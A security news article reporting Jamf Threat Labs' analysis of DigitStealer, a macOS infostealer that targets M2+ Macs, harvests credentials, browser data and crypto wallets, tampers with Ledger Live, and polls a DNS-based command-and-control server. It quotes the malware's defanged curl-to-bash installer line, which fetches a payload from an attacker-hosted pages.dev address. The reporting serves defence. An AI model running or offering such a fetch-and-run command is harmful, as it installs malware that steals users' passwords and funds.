Advanced macOS DigitStealer Targets M2+ Macs, Hijacking Ledger Live via JXA and DNS-Based C2

Jamf Threat Labs has uncovered a new macOS infostealer—named DigitStealer—that demonstrates an unusually high degree of sophistication, stealth, and platform awareness. The malware uses advanced hardware-based execution gates, multi-stage payload delivery, Cloudflare Pages hosting, JXA (JavaScript for Automation), and even tampering with cryptocurrency wallet software such as Ledger Live.

According to Jamf’s researchers, “DigitStealer… leverages advanced hardware checks and multi-stage attacks to evade detection and steal sensitive data.”

The newly discovered sample was found packaged as an unsigned disk image named DynamicLake.dmg, spoofing the legitimate macOS utility. Jamf researchers note that:

“The disk image appears to masquerade as the legitimate DynamicLake macOS utility… Instead, the fake version is distributed via the domain dynamiclake[.]org.”

Most alarming, the malware was fully undetected on VirusTotal at the time of analysis.

DigitStealer begins with a seemingly simple drag-to-terminal installation script, which fetches the first payload via a one-line command:

curl -fsSL https[:]//67e5143a9ca7d2240c137ef80f2641d6.pages[.]dev/c9c114433040497328fe9212012b1b94.aspx| bash

Once decoded, the dropper reveals unusually extensive anti-analysis features, including locale restrictions, VM detection, and hardware-specific sysctl checks:

“One notable addition is a locale check… to determine the system’s country setting and exit if it matches certain predefined values.”

“The script introduces a new set of anti-analysis checks targeting Apple Silicon systems… to determine whether the target system is running on an Apple Silicon M2 chip or newer.”

In practice, the malware refuses to execute on VMs, Intel Macs, and—intentionally or not—Apple M1 machines, focusing instead on M2 or later models.

The first major payload is surprisingly straightforward: an AppleScript that prompts the victim for their macOS password and immediately begins credential harvesting.

Key actions include:

• Stealing and exfiltrating credentials and files via the attacker’s domain
• Collecting and zipping Desktop, Documents, Downloads, and Notes
• Resetting macOS TCC permissions to weaken privacy controls
• Modifying the Ledger Live cryptocurrency wallet application

The analysis notes:

“The AppleScript retrieved by the stealer modifies Ledger Live differently than many previous campaigns… downloading three separate parts and concatenating them.”

This multi-part assembly tactic is designed to evade single-file detection by security tools.

A second, more complex JavaScript for Automation (JXA) payload is delivered to harvest:

• Browser data (Chrome, Brave, Edge, Firefox)
• Cryptocurrency wallets (Ledger, Electrum, Exodus, Coinomi)
• macOS Keychain
• VPN configurations
• Telegram data

According to Jamf:

“It’s interesting to see this functionality split out into a separate stage, likely as an attempt to reduce detection by breaking up indicators across multiple payloads.”

The third payload zeroes in on users of Ledger Live, modifying the application configuration to redirect sensitive data:

“The script does the following: points Ledger Live to an attacker-controlled endpoint… replaces or modifies the data.endpoint object with attacker-supplied values.”

This enables the attackers to exfiltrate seed phrases or inject malicious wallet configurations—an extremely high-value target.

The final stage establishes persistence through a Launch Agent that dynamically retrieves its payload from a DNS TXT record:

“This method of fetching a value from a TXT record… is not something we have previously observed in macOS infostealers.”

The downloaded JXA script acts as a long-running backdoor, polling the C2 server every 10 seconds for new AppleScript or JavaScript commands.

Jamf notes:

“This final payload functions as a persistent JXA agent that continuously polls the attacker’s command and control server… sending the system’s hardware UUID, hashed with MD5.”

The DigitStealer campaign demonstrates a significant escalation in macOS threat development:

“This latest variant… shows a growing level of sophistication in how threats are built for macOS.”

Its multilayered delivery, hardware-aware targeting, and use of legitimate hosting platforms such as Cloudflare Pages place it among the most advanced infostealers observed this year.

Jamf concludes with a warning:

“It serves as another reminder that malware authors are abusing legitimate services and distribution methods to bypass macOS security controls.”

Related Posts:

• Mac Mini M2 Power Issue: Apple Offers Free Repair for Affected Models
• TikTok Preps New “M2” App for US Launch Amid Divestment Deadline & Oracle Deal
• Hardware wallet manufacturer Ledger exists serious flaws
• North Korean APT Group Targets macOS with Flutter-based Malware in Cryptocurrency Apps
• Crypto Crack: Malicious Code Lurks in Ledger dApps, Drains Millions